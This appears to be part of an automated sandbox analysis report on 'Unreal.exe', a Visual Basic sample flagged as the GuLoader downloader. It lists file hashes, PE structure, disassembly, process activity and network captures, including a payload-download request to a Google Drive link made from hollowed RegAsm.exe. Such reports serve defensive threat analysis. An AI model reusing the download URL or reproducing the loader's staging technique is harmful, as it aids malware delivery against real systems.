                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B..#...#...#..EV...#...Q...#...Q...#...Q...#...Q...#...#..."..EV..#..EVN..#..EV...#..Rich.#..........PE..d.....P.........."......`....................@.............................0.......-....`.......... .......................................t..d....... ........D... ..h!... ......d...p.......................(......8...........0................................text...2R.......`.................. ..`.rdata.......p... ...p..............@..@.data..../....... ..................@....pdata...D.......P..................@..@.rsrc... ...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................
                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\mpasdlta.vdm
                  Process:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):7754168
                  Entropy (8bit):7.999076442471787
                  Encrypted:true
                  SSDEEP:196608:YXO9SVxVkHWgVLfT19HDihdTNpwvjAkE36nywlAVILpzyyaW27:YZXmHdBfpMjUlywlAat3Bm
                  MD5:8B78E09BD2D0734CF4EDB44C68F22368
                  SHA1:E9C0F6D912ED28066201118AA296493A738E8D7F
                  SHA-256:7FEA9243F8AFF82658D32716D7D668EFD6986D78E15C5E3E35CDD94B565BA32A
                  SHA-512:36C255E4768179257F0B5A9B9B15C21113FED29633144302B6FD90C96D7AD9D5116CD77E9822F0389A4B7904A739F8B295513D5528B354CD9EC70DA7D5AF160F
                  Malicious:false
                  Antivirus:
                  • Antivirus: Virustotal, Detection: 0%, Browse
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R......R..P...R.Rich..R.PE..d.....Qa.........." ..........v..............................................Pv.......v...`.......................................................... ..8+v..........0v..!...........................................................................................rdata..p...........................@..@.rsrc...8+v.. ...,v.................@..@......Qa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... ..x*v..rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\mpavdlta.vdm
                  Process:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:modified
                  Size (bytes):5016504
                  Entropy (8bit):7.997724088667752
                  Encrypted:true
                  SSDEEP:98304:HHeb+Ze66NXRdSKHWdezWUTIm0GXodoubtS8RVZGgA7ASskPCDL5MeS8YjN:H+aZN6NXRdSdCWUTILGI3pGXdrP8LPSl
                  MD5:C64D6E20AF376A357E27E01E81023E58
                  SHA1:348B30450CA17871D3957502CF28183B1B3FD8C1
                  SHA-256:8D427A5CB59EFC21A66E8A7E2EBCDE0F7B1E71EA0E4627B04443667C6992614D
                  SHA-512:52E5BDA32BE278C578B5377FD08EBD928B88802E8883B50F06FC6EDF45E287831BC5D2245F2984E5AECD67BC24BC293BF3FC9C266E91D3FAABB092D598F8A944
                  Malicious:false
                  Antivirus:
                  • Antivirus: Virustotal, Detection: 0%, Browse
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R......R..P...R.Rich..R.PE..d.....Qa.........." .........hL...............................................L......GM...`.......................................................... ...eL..........jL..!...........................................................................................rdata..p...........................@..@.rsrc....eL.. ...fL.................@..@......Qa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... ...dL..rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\MpSigStub.log
                  Process:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe
                  File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                  Category:modified
                  Size (bytes):6856
                  Entropy (8bit):3.555984344338531
                  Encrypted:false
                  SSDEEP:96:BRKisMYmA2KxoZvHoBYETZWDzrH+LBWjz5f0hSsFX:nKioD2Kx0HoNer0GB0vl
                  MD5:9A80E0210B6CC8C743A2B0286A426983
                  SHA1:614CA8E4EA8E2DE3A141C1BB7CFA03EE27259CEA
                  SHA-256:D410EF955BDCD1127A2D87A70AE04285B1B609B8C5F0C6AD31E6DA6164A351FF
                  SHA-512:51FD352689AFA312917EC50A8DFF35179E13181B9D0DEF7B0647E2A8975F371DB0C345E2B69D0A08908D6DF0DE157BCAF7FEA38686811701F2C75F1ACD57785D
                  Malicious:false
                  Preview: ..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....S.t.a.r.t. .t.i.m.e.:. .2.0.2.1.-.0.9.-.2.7. .1.5.:.3.8.:.0.3.Z.....P.r.o.c.e.s.s.:. .2.3.9.0...1.d.7.b.3.b.5.a.8.d.2.b.a.0.c.....C.o.m.m.a.n.d.:. ./.s.t.u.b. .1...1...1.8.5.0.0...1.0. ./.p.a.y.l.o.a.d. .1...3.4.9...1.4.9.6...0. ./.p.r.o.g.r.a.m. .C.:.\.W.i.n.d.o.w.s.\.S.E.R.V.I.C.~.1.\.N.E.T.W.O.R.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.p.a.m.-.2.0.b.5.c.9.3.8...e.x.e. ./.q. .W.D.....A.d.m.i.n.i.s.t.r.a.t.o.r.:. .n.o.....V.e.r.s.i.o.n.:. .1...1...1.8.5.0.0...1.0.........=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=. .P.r.o.d.u.c.t.S.e.a.r.c.h. .=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=......... . . . . . . . . . . . . . . .M.i.c.r.o.s.o.f.t. .W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r. .(.R.S.1.+.).:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . . . . .S.t.a.t.

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):6.281321845122127
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.15%
                  • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:Unreal.exe
                  File size:102400
                  MD5:35a93d1f2edc044b3d8289abfeb17a43
                  SHA1:c29f2524ae4bd239c849720b1fc6ce5c13bee93b
                  SHA256:88d3b3a6564e25b63b31f4a00361384fd294f228763b3bde4e3162144971d385
                  SHA512:dab0233817f1a28f0e1d15eb449d9c3c364796f6ddd66ced4307f3359635c29f38f80edd5e348bba03dd01d5522d358df1abd6d59e9ae94e750238af53b04bff
                  SSDEEP:1536:yS+Spugs2L010fBhmNDLI41mFLHvHWJbrZk5Le5O3VzM/:F5puZA01iBYNh1m1HvHwfZkRz0
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.......0...~...0.......0...Rich1...........PE..L...UL[W.................P...0...............`....@................

                  File Icon

                  Icon Hash:78f8d6d4ac88d0e2

                  Static PE Info

                  General

                  Entrypoint:0x4012d4
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  DLL Characteristics:
                  Time Stamp:0x575B4C55 [Fri Jun 10 23:25:09 2016 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:1eb0aaa4f15bbd841e91215ce68e26d2

                  Entrypoint Preview

                  Instruction
                  push 00413CE4h
                  call 00007F8700B55125h
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  xor byte ptr [eax], al
                  add byte ptr [eax], al
                  cmp byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  pop es
                  retf
                  dec ebx
                  enter 5C49h, 45h
                  or byte ptr [eax-32482CABh], 0000002Dh
                  mov dword ptr [eax], 00000000h
                  add byte ptr [ecx], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add al, ah
                  call 00007F8779FC5154h
                  insd
                  outsb
                  outsd
                  add byte ptr [ecx+00h], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  dec esp
                  xor dword ptr [eax], eax
                  add dword ptr [55396847h], ebp
                  retf
                  adc ecx, dword ptr [ecx-62h]
                  xor ch, ch
                  mov byte ptr [edx+ebx*2], dl
                  xor ah, byte ptr [ecx+05h]
                  adc al, dh
                  stosd
                  in eax, 79h
                  push ecx
                  inc eax

                  Data Directories

                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x153b4 | 0x28 | .text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x17000 | 0x1cb8 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x228 | 0x20 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0xdc | .text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                  Sections

                  Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  .text | 0x1000 | 0x14788 | 0x15000 | False | 0.563720703125 | data | 6.65071196081 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .data | 0x16000 | 0x9f4 | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .rsrc | 0x17000 | 0x1cb8 | 0x2000 | False | 0.26416015625 | data | 3.4642899067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                  Resources

                  Name | RVA | Size | Type | Language | Country
                  CUSTOM | 0x18b7a | 0x13e | MS Windows icon resource - 1 icon, 16x16, 16 colors | English | United States
                  CUSTOM | 0x185fc | 0x57e | MS Windows icon resource - 1 icon, 16x16, 8 bits/pixel | English | United States
                  CUSTOM | 0x1807e | 0x57e | MS Windows icon resource - 1 icon, 16x16, 8 bits/pixel | English | United States
                  CUSTOM | 0x17f40 | 0x13e | MS Windows icon resource - 1 icon, 16x16, 16 colors | English | United States
                  RT_ICON | 0x178d8 | 0x668 | dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 252, next used block 65280 | |
                  RT_ICON | 0x175f0 | 0x2e8 | data | |
                  RT_ICON | 0x174c8 | 0x128 | GLS_BINARY_LSB_FIRST | |
                  RT_GROUP_ICON | 0x17498 | 0x30 | data | |
                  RT_VERSION | 0x17230 | 0x268 | MS Windows COFF Motorola 68000 object file | English | United States

                  Imports

                  DLL | Import
                  MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, __vbaFpI4, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                  Version Infos

                  Description | Data
                  Translation | 0x0409 0x04b0
                  InternalName | Unreal
                  FileVersion | 1.00
                  CompanyName | CelRox
                  Comments | CelRox
                  ProductName | CelRox
                  ProductVersion | 1.00
                  FileDescription | CelRox
                  OriginalFilename | Unreal.exe

                  Possible Origin

                  Language of compilation system | Country where language is spoken | Map
                  English | United States |

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Sep 27, 2021 16:33:03.858829021 CEST | 49763 | 443 | 192.168.11.20 | 142.250.185.142
                  Sep 27, 2021 16:33:03.858911991 CEST | 443 | 49763 | 142.250.185.142 | 192.168.11.20
                  Sep 27, 2021 16:33:03.859061956 CEST | 49763 | 443 | 192.168.11.20 | 142.250.185.142
                  Sep 27, 2021 16:33:03.878380060 CEST | 49763 | 443 | 192.168.11.20 | 142.250.185.142
                  Sep 27, 2021 16:33:03.878434896 CEST | 443 | 49763 | 142.250.185.142 | 192.168.11.20
                  Sep 27, 2021 16:33:03.930304050 CEST | 443 | 49763 | 142.250.185.142 | 192.168.11.20
                  Sep 27, 2021 16:33:03.930483103 CEST | 49763 | 443 | 192.168.11.20 | 142.250.185.142
                  Sep 27, 2021 16:33:03.932199001 CEST | 443 | 49763 | 142.250.185.142 | 192.168.11.20
                  Sep 27, 2021 16:33:03.932352066 CEST | 49763 | 443 | 192.168.11.20 | 142.250.185.142
                  Sep 27, 2021 16:33:04.046665907 CEST | 49763 | 443 | 192.168.11.20 | 142.250.185.142
                  Sep 27, 2021 16:33:04.046720982 CEST | 443 | 49763 | 142.250.185.142 | 192.168.11.20
                  Sep 27, 2021 16:33:04.047358036 CEST | 443 | 49763 | 142.250.185.142 | 192.168.11.20
                  Sep 27, 2021 16:33:04.047519922 CEST | 49763 | 443 | 192.168.11.20 | 142.250.185.142
                  Sep 27, 2021 16:33:04.050981998 CEST | 49763 | 443 | 192.168.11.20 | 142.250.185.142
                  Sep 27, 2021 16:33:04.093884945 CEST | 443 | 49763 | 142.250.185.142 | 192.168.11.20
                  Sep 27, 2021 16:33:04.207621098 CEST | 443 | 49763 | 142.250.185.142 | 192.168.11.20
                  Sep 27, 2021 16:33:04.207879066 CEST | 49763 | 443 | 192.168.11.20 | 142.250.185.142
                  Sep 27, 2021 16:33:04.207932949 CEST | 443 | 49763 | 142.250.185.142 | 192.168.11.20
                  Sep 27, 2021 16:33:04.208029032 CEST | 443 | 49763 | 142.250.185.142 | 192.168.11.20
                  Sep 27, 2021 16:33:04.208098888 CEST | 49763 | 443 | 192.168.11.20 | 142.250.185.142
                  Sep 27, 2021 16:33:04.208159924 CEST | 49763 | 443 | 192.168.11.20 | 142.250.185.142
                  Sep 27, 2021 16:33:04.267347097 CEST | 49763 | 443 | 192.168.11.20 | 142.250.185.142
                  Sep 27, 2021 16:33:04.267400980 CEST | 443 | 49763 | 142.250.185.142 | 192.168.11.20

                  UDP Packets

                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Sep 27, 2021 16:31:51.976603031 CEST | 58085 | 53 | 192.168.11.20 | 1.1.1.1
                  Sep 27, 2021 16:31:52.127249002 CEST | 53 | 58085 | 1.1.1.1 | 192.168.11.20
                  Sep 27, 2021 16:31:54.922883034 CEST | 59354 | 53 | 192.168.11.20 | 1.1.1.1
                  Sep 27, 2021 16:31:54.931360006 CEST | 53 | 59354 | 1.1.1.1 | 192.168.11.20
                  Sep 27, 2021 16:31:55.018204927 CEST | 55054 | 53 | 192.168.11.20 | 1.1.1.1
                  Sep 27, 2021 16:31:55.026866913 CEST | 53 | 55054 | 1.1.1.1 | 192.168.11.20
                  Sep 27, 2021 16:31:56.873502970 CEST | 59250 | 53 | 192.168.11.20 | 1.1.1.1
                  Sep 27, 2021 16:31:56.881999969 CEST | 53 | 59250 | 1.1.1.1 | 192.168.11.20
                  Sep 27, 2021 16:31:56.890342951 CEST | 55910 | 53 | 192.168.11.20 | 1.1.1.1
                  Sep 27, 2021 16:31:56.898772955 CEST | 53 | 55910 | 1.1.1.1 | 192.168.11.20
                  Sep 27, 2021 16:31:57.064750910 CEST | 59222 | 53 | 192.168.11.20 | 1.1.1.1
                  Sep 27, 2021 16:31:57.073412895 CEST | 53 | 59222 | 1.1.1.1 | 192.168.11.20
                  Sep 27, 2021 16:32:02.251159906 CEST | 55584 | 53 | 192.168.11.20 | 1.1.1.1
                  Sep 27, 2021 16:32:02.259998083 CEST | 53 | 55584 | 1.1.1.1 | 192.168.11.20
                  Sep 27, 2021 16:33:02.271327019 CEST | 54461 | 53 | 192.168.11.20 | 1.1.1.1
                  Sep 27, 2021 16:33:02.280339003 CEST | 53 | 54461 | 1.1.1.1 | 192.168.11.20
                  Sep 27, 2021 16:33:03.836004019 CEST | 54338 | 53 | 192.168.11.20 | 1.1.1.1
                  Sep 27, 2021 16:33:03.844651937 CEST | 53 | 54338 | 1.1.1.1 | 192.168.11.20
                  Sep 27, 2021 16:34:02.289022923 CEST | 52567 | 53 | 192.168.11.20 | 1.1.1.1
                  Sep 27, 2021 16:34:02.297930002 CEST | 53 | 52567 | 1.1.1.1 | 192.168.11.20
                  Sep 27, 2021 16:36:16.852319002 CEST | 61412 | 53 | 192.168.11.20 | 1.1.1.1
                  Sep 27, 2021 16:36:16.860439062 CEST | 53 | 61412 | 1.1.1.1 | 192.168.11.20
                  Sep 27, 2021 16:37:10.334578037 CEST | 49268 | 53 | 192.168.11.20 | 1.1.1.1
                  Sep 27, 2021 16:37:10.343050957 CEST | 53 | 49268 | 1.1.1.1 | 192.168.11.20
                  Sep 27, 2021 16:37:10.835084915 CEST | 49529 | 53 | 192.168.11.20 | 1.1.1.1
                  Sep 27, 2021 16:37:10.850014925 CEST | 53 | 49529 | 1.1.1.1 | 192.168.11.20
                  Sep 27, 2021 16:37:59.539233923 CEST | 65144 | 53 | 192.168.11.20 | 1.1.1.1
                  Sep 27, 2021 16:37:59.549747944 CEST | 53 | 65144 | 1.1.1.1 | 192.168.11.20
                  Sep 27, 2021 16:37:59.709568024 CEST | 62895 | 53 | 192.168.11.20 | 1.1.1.1
                  Sep 27, 2021 16:37:59.718099117 CEST | 53 | 62895 | 1.1.1.1 | 192.168.11.20
                  Sep 27, 2021 16:37:59.969018936 CEST | 65160 | 53 | 192.168.11.20 | 1.1.1.1
                  Sep 27, 2021 16:37:59.980292082 CEST | 53 | 65160 | 1.1.1.1 | 192.168.11.20
                  Sep 27, 2021 16:38:13.172786951 CEST | 49905 | 53 | 192.168.11.20 | 1.1.1.1
                  Sep 27, 2021 16:38:13.181143999 CEST | 53 | 49905 | 1.1.1.1 | 192.168.11.20
                  Sep 27, 2021 16:38:14.989168882 CEST | 58776 | 53 | 192.168.11.20 | 1.1.1.1
                  Sep 27, 2021 16:38:14.998239040 CEST | 53 | 58776 | 1.1.1.1 | 192.168.11.20
                  Sep 27, 2021 16:39:43.704673052 CEST | 49476 | 53 | 192.168.11.20 | 1.1.1.1
                  Sep 27, 2021 16:39:43.714154959 CEST | 53 | 49476 | 1.1.1.1 | 192.168.11.20

                  DNS Queries

                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                  Sep 27, 2021 16:33:03.836004019 CEST | 192.168.11.20 | 1.1.1.1 | 0x7402 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001)
                  Sep 27, 2021 16:36:16.852319002 CEST | 192.168.11.20 | 1.1.1.1 | 0x7634 | Standard query (0) | spclient.wg.spotify.com | A (IP address) | IN (0x0001)

                  DNS Answers

                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                  Sep 27, 2021 16:33:03.844651937 CEST | 1.1.1.1 | 192.168.11.20 | 0x7402 | No error (0) | drive.google.com | | 142.250.185.142 | A (IP address) | IN (0x0001)
                  Sep 27, 2021 16:36:16.860439062 CEST | 1.1.1.1 | 192.168.11.20 | 0x7634 | No error (0) | spclient.wg.spotify.com | edge-web.dual-gslb.spotify.com | | CNAME (Canonical name) | IN (0x0001)
                  Sep 27, 2021 16:36:16.860439062 CEST | 1.1.1.1 | 192.168.11.20 | 0x7634 | No error (0) | edge-web.dual-gslb.spotify.com | | 35.186.224.25 | A (IP address) | IN (0x0001)
                  Sep 27, 2021 16:37:10.343050957 CEST | 1.1.1.1 | 192.168.11.20 | 0xacc3 | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001)

                  HTTP Request Dependency Graph

                  • drive.google.com

                  HTTPS Proxied Packets

                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  0 | 192.168.11.20 | 49763 | 142.250.185.142 | 443 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

                  Timestamp | kBytes transferred | Direction | Data
                  2021-09-27 14:33:04 UTC | 0 | OUT | GET /uc?export=download&id=1JZajQIQdUbLIFKGrWeKAj7F2g5cgApuC HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Host: drive.google.com
                  Cache-Control: no-cache
                  2021-09-27 14:33:04 UTC | 0 | IN | HTTP/1.1 404 Not Found
                  Content-Type: text/html; charset=UTF-8
                  x-chromium-appcache-fallback-override: disallow-fallback
                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                  Content-Security-Policy: script-src 'nonce-MIVbPGF4ZuXsZ2NZTTzVEQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                  Date: Mon, 27 Sep 2021 14:33:04 GMT
                  Expires: Mon, 27 Sep 2021 14:33:04 GMT
                  Cache-Control: private, max-age=0
                  X-Content-Type-Options: nosniff
                  X-Frame-Options: SAMEORIGIN
                  X-XSS-Protection: 1; mode=block
                  Server: GSE
                  Set-Cookie: NID=511=kWh_xUioAXmCXt6QIW6Mm4DtzPI9_fAr2WiFKEmXPAjZvuWqXj1I7phnbwK5qVZOA3KA2Dwc9IGtRHUtfxRy-aBcUQZ4zKf-uCz414_kuMrvIGUe_DgGauW80ouL5dhtM9v6jgmzo75QoUqo2k6HSanF5BaWh7W1UvFmn1Szn94; expires=Tue, 29-Mar-2022 14:33:04 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                  Accept-Ranges: none
                  Vary: Accept-Encoding
                  Connection: close
                  Transfer-Encoding: chunked
                  2021-09-27 14:33:04 UTC | 1 | IN | Data Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30
                  Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#00000
                  2021-09-27 14:33:04 UTC | 1 | IN | Data Raw: 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                  Data Ascii: 0"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
                  2021-09-27 14:33:04 UTC | 1 | IN | Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Code Manipulations

                  Statistics

                  Behavior

                  System Behavior

                  General

                  Start time:16:31:53
                  Start date:27/09/2021
                  Path:C:\Users\user\Desktop\Unreal.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\Desktop\Unreal.exe'
                  Imagebase:0x400000
                  File size:102400 bytes
                  MD5 hash:35A93D1F2EDC044B3D8289ABFEB17A43
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Visual Basic
                  Reputation:low

                  General

                  Start time:16:32:31
                  Start date:27/09/2021
                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                  Wow64 process (32bit):false
                  Commandline:'C:\Users\user\Desktop\Unreal.exe'
                  Imagebase:0xb0000
                  File size:53248 bytes
                  MD5 hash:A64DACA3CFBCD039DF3EC29D3EDDD001
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  General

                  Start time:16:32:31
                  Start date:27/09/2021
                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\Desktop\Unreal.exe'
                  Imagebase:0x980000
                  File size:53248 bytes
                  MD5 hash:A64DACA3CFBCD039DF3EC29D3EDDD001
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.5646431545.0000000000D50000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000000.5536067468.0000000000D50000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000000.5526072916.0000000000D50000.00000040.00000001.sdmp, Author: Joe Security
                  Reputation:low

                  General

                  Start time:16:32:31
                  Start date:27/09/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff664700000
                  File size:875008 bytes
                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  General

                  Start time:16:37:01
                  Start date:27/09/2021
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7508 -s 828
                  Imagebase:0x480000
                  File size:482640 bytes
                  MD5 hash:40A149513D721F096DDF50C04DA2F01F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Visual Basic
                  Reputation:low

                  General

                  Start time:16:38:00
                  Start date:27/09/2021
                  Path:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exe
                  Wow64 process (32bit):false
                  Commandline:'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-20b5c938.exe' /q WD
                  Imagebase:0x7ff7fe970000
                  File size:13390280 bytes
                  MD5 hash:4CF0EA82FA547953BAA24CEB4AFDE935
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:low

                  General

                  Start time:16:38:03
                  Start date:27/09/2021
                  Path:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe /stub 1.1.18500.10 /payload 1.349.1496.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-20b5c938.exe /q WD
                  Imagebase:0x7ff742dc0000
                  File size:803176 bytes
                  MD5 hash:01F92DC7A766FF783AE7AF40FD0334FB
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 0%, Virustotal, Browse
                  • Detection: 0%, ReversingLabs
                  Reputation:low

                  General

                  Start time:16:38:04
                  Start date:27/09/2021
                  Path:C:\Windows\System32\wevtutil.exe
                  Wow64 process (32bit):false
